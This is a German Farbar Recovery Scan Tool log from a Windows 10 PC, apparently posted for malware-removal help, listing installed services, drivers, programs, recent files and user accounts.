CHR Extension: (Google Drive) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-11-09]

CHR Extension: (YouTube) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2020-11-09]

CHR Extension: (Tabellen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2020-11-09]

CHR Extension: (Google Docs Offline) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-11-09]

CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-11-09]

CHR Extension: (Google Mail) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-11-09]

CHR Extension: (Chrome Media Router) - C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-09]

CHR Profile: C:\Users\buskr5\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-07]
 

==================== Dienste (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)

R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [105240 2017-10-12] (Alps Electric Co., LTD. -> Alps Electric Co., Ltd.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-05-20] (Apple Inc. -> Apple Inc.)

R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9105800 2020-12-01] (Microsoft Corporation -> Microsoft Corporation)

R2 DATEV Sicherheitspaket-Basis-Dienst; C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\SiPaHostService.exe [408592 2020-10-20] (DATEV eG 08 2 -> DATEV eG)

S3 FBIOSDRVService; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\fbiosdrv-service.exe [130200 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 Fuj02e3DriverUtilityService; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3-utility.exe [177432 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R2 iked; C:\Program Files\ShrewSoft\VPN Client\iked.exe [1127736 2013-07-01] (Shrew Soft Inc -> )

R2 ipsecd; C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe [810808 2013-07-01] (Shrew Soft Inc -> )

R3 lmhosts; C:\WINDOWS\System32\svchost.exe [57360 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)

R3 lmhosts; C:\WINDOWS\SysWOW64\svchost.exe [47016 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 NlaSvc; C:\WINDOWS\System32\svchost.exe [57360 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 NlaSvc; C:\WINDOWS\SysWOW64\svchost.exe [47016 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 nsi; C:\WINDOWS\system32\svchost.exe [57360 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 nsi; C:\WINDOWS\SysWOW64\svchost.exe [47016 2020-10-14] (Microsoft Windows Publisher -> Microsoft Corporation)

S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5197552 2020-12-09] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [12720144 2020-11-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)

R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
 

===================== Treiber (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

S3 dlcdcncm; C:\WINDOWS\System32\drivers\dlcdcncm62_x64.sys [92400 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

S3 dlusbaudio; C:\WINDOWS\system32\DRIVERS\dlusbaudio_x64.sys [238320 2017-05-29] (DISPLAYLINK -> DisplayLink Corp.)

R3 FBIOSDRV; C:\WINDOWS\System32\DriverStore\FileRepository\fbiosdrv.inf_amd64_34d91384b27330e6\FBIOSDRV.sys [43672 2020-06-29] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 fuj02e3; C:\WINDOWS\System32\DriverStore\FileRepository\fuj02e3.inf_amd64_b472ee039d0bcad8\fuj02e3.sys [59672 2019-05-09] (FUJITSU CLIENT COMPUTING LIMITED -> FUJITSU CLIENT COMPUTING LIMITED)

R3 GabiAcpi; C:\WINDOWS\System32\drivers\GabiAcpi.sys [40488 2020-07-15] (FUJITSU CLIENT COMPUTING LIMITED -> Fujitsu Technology Solutions)

U5 KOBCCID; C:\Windows\System32\Drivers\KOBCCID.sys [116864 2019-01-16] (KOBIL Systems GmbH) [Datei ist nicht signiert]

S3 KobilCcid; C:\WINDOWS\System32\drivers\KobilCcid_x64.sys [50432 2019-10-21] (KOBIL Systems GmbH -> KOBIL Systems GmbH)

S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2020-05-06] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)

S4 usbrndis6; C:\WINDOWS\System32\drivers\usb80236.sys [24064 2019-12-07] (Microsoft Corporation) [Datei ist nicht signiert]

R1 vflt; C:\WINDOWS\system32\DRIVERS\vfilter.sys [24064 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S3 vnet; C:\WINDOWS\System32\drivers\virtualnet.sys [17408 2013-07-01] (Microsoft Windows Hardware Compatibility Publisher -> Shrew Soft Inc)

S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)

S3 WDC_SAM; C:\WINDOWS\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.)

R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
 

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 
 

==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-09 18:10 - 2021-01-09 18:11 - 000021700 _____ C:\Users\buskr5\Downloads\FRST.txt

2021-01-09 18:10 - 2021-01-09 18:10 - 002281472 _____ (Farbar) C:\Users\buskr5\Downloads\FRST64.exe

2021-01-09 15:44 - 2021-01-09 15:44 - 000000000 ____D C:\WINDOWS\system32\appmgmt

2021-01-09 15:05 - 2021-01-09 18:11 - 000000000 ____D C:\FRST

2021-01-07 19:12 - 2021-01-07 19:12 - 000024546 _____ C:\Users\buskr5\Documents\bookmarks_07.01.21.html

2021-01-07 19:11 - 2021-01-07 19:11 - 000048978 _____ C:\Users\buskr5\Documents\cc_20210107_191149.reg

2021-01-07 19:09 - 2021-01-07 19:10 - 000000000 ____D C:\Users\buskr5\Downloads\ccsetup575

2021-01-07 18:52 - 2021-01-07 18:59 - 000000000 ____D C:\AdwCleaner

2021-01-05 09:49 - 2021-01-05 09:49 - 000012437 _____ C:\Users\buskr5\Downloads\Werkdienstwohnung-Werkmietwohnung.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000345367 _____ C:\Users\buskr5\Downloads\LRA-WM_ZS_Was_braucht_man_wann_zur_Zulassung_10-2019.pdf

2020-12-21 10:10 - 2020-12-21 10:10 - 000013851 _____ C:\Users\buskr5\Downloads\Erklärung_an_Eides_Statt.pdf

2020-12-21 10:09 - 2020-12-21 10:09 - 000280628 _____ C:\Users\buskr5\Downloads\SEPA_Kombimandat.pdf

2020-12-21 10:04 - 2020-12-21 10:04 - 000020116 _____ C:\Users\buskr5\Downloads\Vollmacht (1).pdf

2020-12-17 08:20 - 2020-12-17 08:20 - 000000000 ____D C:\Users\buskr5\Documents\Lea Schule

2020-12-14 12:10 - 2020-12-14 12:10 - 000196173 _____ C:\Users\buskr5\Desktop\untermietvertrag-mustervorlage-word-pdf.pdf

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner (3)

2020-12-14 11:35 - 2020-12-15 10:33 - 000000000 ____D C:\Users\buskr5\Desktop\Isi

2020-12-10 08:55 - 2020-12-10 08:55 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019 (1).pdf

2020-12-10 08:50 - 2020-12-10 08:50 - 000336734 _____ C:\Users\buskr5\Downloads\ESt Krieger, Roland 2019.pdf

2020-12-10 08:47 - 2020-12-10 08:47 - 000427266 _____ C:\Users\buskr5\Downloads\Krieger Handelsbericht 2019.pdf

2020-12-10 08:47 - 2020-12-10 08:47 - 000199415 _____ C:\Users\buskr5\Downloads\Krieger Steuerbericht 2019.pdf

2020-12-10 08:45 - 2020-12-10 08:45 - 000140074 _____ C:\Users\buskr5\Downloads\GewSt Krieger Roland 2019.pdf
 

==================== Ein Monat (geänderte) ==================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
 

2021-01-09 17:55 - 2020-07-16 07:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy

2021-01-09 17:55 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft

2021-01-09 16:01 - 2018-12-18 08:26 - 000002350 _____ C:\Users\buskr5\Desktop\INCOGNITO.lnk

2021-01-09 15:48 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\ConnectedDevicesPlatform

2021-01-09 15:46 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness

2021-01-09 15:46 - 2018-12-17 10:52 - 000000000 __SHD C:\Users\buskr5\IntelGraphicsProfiles

2021-01-09 15:44 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF

2021-01-09 15:44 - 2018-12-19 10:28 - 000000000 ____D C:\Program Files (x86)\InstallShield Installation Information

2021-01-09 15:36 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps

2021-01-09 15:18 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\PrintDialog

2021-01-09 15:02 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel

2021-01-09 15:02 - 2018-12-17 09:52 - 000000000 __RHD C:\Users\Public\AccountPictures

2021-01-09 15:01 - 2020-06-16 05:58 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk

2021-01-07 17:24 - 2020-07-16 08:03 - 001632020 _____ C:\WINDOWS\system32\PerfStringBackup.INI

2021-01-07 17:24 - 2019-12-07 15:51 - 000707136 _____ C:\WINDOWS\system32\perfh007.dat

2021-01-07 17:24 - 2019-12-07 15:51 - 000142394 _____ C:\WINDOWS\system32\perfc007.dat

2021-01-07 17:17 - 2020-12-07 10:38 - 000000000 ____D C:\Program Files (x86)\TeamViewer

2021-01-07 17:17 - 2020-07-16 08:02 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT

2021-01-07 17:17 - 2020-07-16 07:55 - 000008192 ___SH C:\DumpStack.log.tmp

2021-01-07 17:17 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\ServiceState

2021-01-07 07:23 - 2018-12-17 10:52 - 000000000 ____D C:\Users\buskr5\AppData\Local\Packages

2021-01-07 07:21 - 2018-12-17 17:20 - 000002293 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2021-01-05 12:52 - 2018-12-20 11:36 - 000002248 ____H C:\Users\buskr5\Documents\Default.rdp

2021-01-05 12:41 - 2019-12-07 15:52 - 000000000 ____D C:\WINDOWS\system32\FxsTmp

2021-01-05 12:04 - 2019-04-30 07:26 - 000031577 _____ C:\Users\buskr5\Desktop\Monatliche Abzüge.xlsx

2020-12-28 09:55 - 2019-11-12 09:00 - 000000000 ____D C:\Users\buskr5\Desktop\Neuer Ordner

2020-12-27 10:42 - 2018-12-17 10:24 - 000000000 ____D C:\Program Files (x86)\Microsoft Office

2020-12-17 12:50 - 2020-07-15 21:58 - 000002386 _____ C:\Users\buskr5\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk

2020-12-17 12:50 - 2018-12-17 10:54 - 000000000 ___RD C:\Users\buskr5\OneDrive

2020-12-16 11:01 - 2018-12-17 10:54 - 000000000 ____D C:\Users\buskr5\AppData\Local\PlaceholderTileLogoFolder

2020-12-14 08:49 - 2018-12-17 11:06 - 000002136 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk

2020-12-10 09:12 - 2019-09-16 11:29 - 000000000 ___RD C:\Users\buskr5\Desktop\Schulkinder
 

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========
 

2019-01-16 11:54 - 2019-01-16 11:54 - 000000463 _____ () C:\Users\buskr5\AppData\Local\belegtransfer_setup.log
 

==================== FLock ==============================
 

2019-12-07 10:14 C:\PerfLogs

2020-07-16 07:56 C:\Recovery

2020-12-20 09:26 C:\WINDOWS\system32\config

2019-12-07 10:31 C:\WINDOWS\system32\Configuration

2019-12-07 10:14 C:\WINDOWS\system32\DriverState

2021-01-05 12:41 C:\WINDOWS\system32\FxsTmp

2019-12-07 10:14 C:\WINDOWS\system32\ias

2020-07-16 07:55 C:\WINDOWS\system32\MsDtc

2019-12-07 10:14 C:\WINDOWS\system32\networklist

2021-01-09 17:55 C:\WINDOWS\system32\SleepStudy

2021-01-09 18:05 C:\WINDOWS\system32\sru

2021-01-09 15:04 C:\WINDOWS\system32\Tasks

2020-07-16 07:55 C:\WINDOWS\system32\Tasks_Migrated

2021-01-07 17:19 C:\WINDOWS\system32\WDI

2021-01-09 15:36 C:\Program Files\WindowsApps

2020-07-16 08:02 C:\WINDOWS\diagerr.xml

2020-07-16 08:02 C:\WINDOWS\diagwrn.xml

2019-09-11 20:04 C:\WINDOWS\InfusedApps

2020-07-16 07:55 C:\WINDOWS\LiveKernelReports

2019-12-07 10:14 C:\WINDOWS\ModemLogs

2021-01-09 18:11 C:\WINDOWS\Prefetch

2021-01-07 17:17 C:\WINDOWS\ServiceState

2019-12-07 10:31 C:\WINDOWS\SysWOW64\config

2019-12-07 10:31 C:\WINDOWS\SysWOW64\Configuration

2019-12-07 15:52 C:\WINDOWS\SysWOW64\FxsTmp

2019-12-07 10:14 C:\WINDOWS\SysWOW64\Msdtc

2019-12-07 10:14 C:\WINDOWS\SysWOW64\networklist

2019-12-07 10:14 C:\WINDOWS\SysWOW64\sru

2019-12-07 10:31 C:\WINDOWS\SysWOW64\Tasks

2019-12-07 10:14 C:\WINDOWS\system32\Drivers\DriverData

2020-07-21 09:22 C:\Users\ITMueller

2020-11-09 12:47 C:\ProgramData\Packages

2019-12-07 15:54 C:\ProgramData\WindowsHolographicDevices
 

==================== SigCheck ============================
 

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
 
 
 

ACHTUNG: ==> Auf den BCD konnte nicht zugegriffen werden. der Benutzer ist kein Administrator -> Der Speicher f�r die Startkonfigurationsdaten konnte nicht ge�ffnet werden.

Zugriff verweigert
 

==================== Ende von FRST.txt ========================

So und jetzt nochmal mit Admin rechten

Code:

Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-01-2021

durchgeführt von buskr5 (09-01-2021 18:22:53)

Gestartet von C:\Users\buskr5\Downloads

Windows 10 Pro Version 20H2 19042.685 (X64) (2020-07-16 07:02:22)

Start-Modus: Normal

==========================================================
 
 

==================== Konten: =============================
 

Administrator (S-1-5-21-4192198180-2913720414-2796424460-500 - Administrator - Disabled)

buskr5 (S-1-5-21-4192198180-2913720414-2796424460-1002 - Administrator - Enabled) => C:\Users\buskr5

DefaultAccount (S-1-5-21-4192198180-2913720414-2796424460-503 - Limited - Disabled)

Gast (S-1-5-21-4192198180-2913720414-2796424460-501 - Limited - Disabled)

ITMueller (S-1-5-21-4192198180-2913720414-2796424460-1001 - Administrator - Enabled) => C:\Users\ITMueller

WDAGUtilityAccount (S-1-5-21-4192198180-2913720414-2796424460-504 - Limited - Disabled)
 

==================== Sicherheits-Center ========================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
 

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 

==================== Installierte Programme ======================
 

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
 

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 20.013.20074 - Adobe Systems Incorporated)

ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 10.100.404.117 - Alps Electric)

Apple Application Support (32-Bit) (HKLM-x32\...\{9738288C-21BC-4F54-AB4F-72F059339376}) (Version: 8.6 - Apple Inc.)

Apple Application Support (64-Bit) (HKLM\...\{DEB339C1-2687-43AB-816A-8714F3E26846}) (Version: 8.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{C788AE25-3D4E-4D18-811B-3219F778487E}) (Version: 13.5.1.2 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{A3985C05-7386-411F-A4BF-32A73F37EB44}) (Version: 2.6.3.1 - Apple Inc.)

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)

DATEV Belegtransfer V.3.5 (HKLM-x32\...\{EC561A24-754E-44F1-B76F-2FDA3DF9E912}) (Version: 2.03 - DATEV eG)

DisplayLink Graphics Driver (HKLM\...\{113EF6B6-57CF-41EA-9F1B-BA50345EDEA5}) (Version: 9.0.1651.0 - DisplayLink Corp.)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 87.0.4280.141 - Google LLC)

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.51 - Google LLC) Hidden

HP Dropbox Plugin (HKLM-x32\...\{1E18E86D-632C-48B5-962C-B60C2E53A478}) (Version: 36.0.41.58587 - HP)

HP Google Drive Plugin (HKLM-x32\...\{039DDA62-50CC-4E7F-9D54-7CF032A2D362}) (Version: 36.0.41.58587 - HP)

HP OfficeJet Pro 7740 series - Grundlegende Software für das Gerät (HKLM\...\{D2C5832A-0287-445C-845F-E53F332C8A18}) (Version: 40.12.1161.1896 - HP Inc.)

HP OfficeJet Pro 7740 series Hilfe (HKLM-x32\...\{5DA0FF5D-80F6-406A-A385-033BA7CBE6B8}) (Version: 39.0.0 - HP)

Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 24.20.100.6290 - Intel Corporation)

iTunes (HKLM\...\{D63C9A58-8F6C-4765-A7B7-6F7711707F46}) (Version: 12.10.8.5 - Apple Inc.)

KOBIL CCID driver x64x86 (HKLM-x32\...\{C5CBEBFF-3DB4-4271-A706-757BBE3BD5AE}) (Version: 1.018.03071 - KOBIL Systems) Hidden

MediaHuman YouTube to MP3 Converter 3.9.9.46 (HKLM-x32\...\MediaHuman YouTube to MP3 Converter_is1) (Version: 3.9.9.46 - MediaHuman)

Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.13426.20404 - Microsoft Corporation)

Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 87.0.664.75 - Microsoft Corporation)

Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.139.59 - )

Microsoft OneDrive (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\OneDriveSetup.exe) (Version: 20.201.1005.0009 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.12.25810 (HKLM-x32\...\{e2ee15e2-a480-4bc5-bfb7-e9803d1d9823}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27027 (HKLM-x32\...\{fd9b6070-d13e-45dc-819b-41806bf45b6b}) (Version: 14.16.27027.1 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.12.25810 (HKLM-x32\...\{56e11d69-7cc9-40a5-a4f9-8f6190c4d84d}) (Version: 14.12.25810.0 - Microsoft Corporation)

Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27027 (HKLM-x32\...\{39e28474-b67b-4209-af1b-e9ad0a83d8ca}) (Version: 14.16.27027.1 - Microsoft Corporation)

Mietbus (HKLM-x32\...\ST4UNST #1) (Version:  - )

Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.13426.20404 - Microsoft Corporation) Hidden

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8816.1 - Realtek Semiconductor Corp.)

Screenpresso (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Screenpresso) (Version: 1.8.4.0 - Learnpulse)

Shrew Soft VPN Client (HKLM\...\Shrew Soft VPN Client) (Version:  - )

Sicherheitspaket compact (HKLM-x32\...\{0FA40302-24BC-4235-8717-CCAB7D5A3AC2}) (Version: 6.8.102.20294 - DATEV eG) Hidden

Sicherheitspaket compact (HKLM-x32\...\{480df3d6-f2a5-4f2c-8ee3-3079eefa1c61}) (Version: 6.8.102.20294 - DATEV eG)

Sicherheitspaket compact VDST (HKLM-x32\...\{1277C975-FD21-4782-BFD3-6D7BAB7AF466}) (Version: 6.1.100.18178 - DATEV eG) Hidden

Sicherheitspaket compact x64 (HKLM\...\{FE909D88-4863-45D2-9FFB-61CB2DD592F0}) (Version: 6.8.102.20294 - DATEV eG) Hidden

TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.12.4 - TeamViewer)

Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{32DC821E-4A7D-4878-BEE8-337FA153D7F2}) (Version: 2.63.0.0 - Microsoft Corporation) Hidden

Zoom (HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\ZoomUMX) (Version: 5.1 - Zoom Video Communications, Inc.)
 

Packages:

=========

HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_122.1.778.0_x64__v10z8vjag6ke6 [2021-01-09] (HP Inc.)

Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-06-02] (Microsoft Corporation)

Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]

Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-21] (Microsoft Corporation) [MS Ad]

Phototastic Collage -> C:\Program Files\WindowsApps\ThumbmunkeysLtd.PhototasticCollage_3.23.1.0_x64__nfy108tqq3p12 [2020-11-12] (Thumbmunkeys Ltd)
 

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==============
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
 

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Keine Datei

ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_62f096fe77e085c0\igfxDTCM.dll [2018-11-14] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
 

==================== Codecs (Nicht auf der Ausnahmeliste) ====================
 

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
 

HKU\S-1-5-21-4192198180-2913720414-2796424460-1002\...\Drivers32: [vidc.spv1] => C:\Users\buskr5\AppData\Local\Learnpulse\Screenpresso\ScreenpressoCodec.dll [167656 2021-01-09] (Learnpulse -> LearnPulse)
 

==================== Verknüpfungen & WMI ========================
 

==================== Geladene Module (Nicht auf der Ausnahmeliste) =============
 

2013-07-01 00:17 - 2013-07-01 00:17 - 000017920 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libdtp.dll

2013-07-01 00:15 - 2013-07-01 00:15 - 000022016 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libidb.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000628224 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libike.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000116736 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libip.dll

2013-07-01 00:15 - 2013-07-01 00:15 - 000018432 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libith.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000013312 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\liblog.dll

2013-07-01 00:17 - 2013-07-01 00:17 - 000029184 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libpfk.dll

2013-07-01 00:17 - 2013-07-01 00:17 - 000035840 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvflt.dll

2013-07-01 00:16 - 2013-07-01 00:16 - 000039936 _____ () [Datei ist nicht signiert] C:\Program Files\ShrewSoft\VPN Client\libvnet.dll
 

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========
 

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================
 

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================
 

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========
 

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-16] (Microsoft Corporation -> Microsoft Corporation)

BHO: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO64002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

BHO-x32: SCardBHOEvent Class -> {AF8CD625-E04A-4A8F-A90A-0C74846C2E30} -> C:\Program Files (x86)\DATEV\PROGRAMM\SiPaCompact\DVCCSAScardBHO002.dll [2020-10-20] (DATEV eG 08 2 -> DATEV eG)

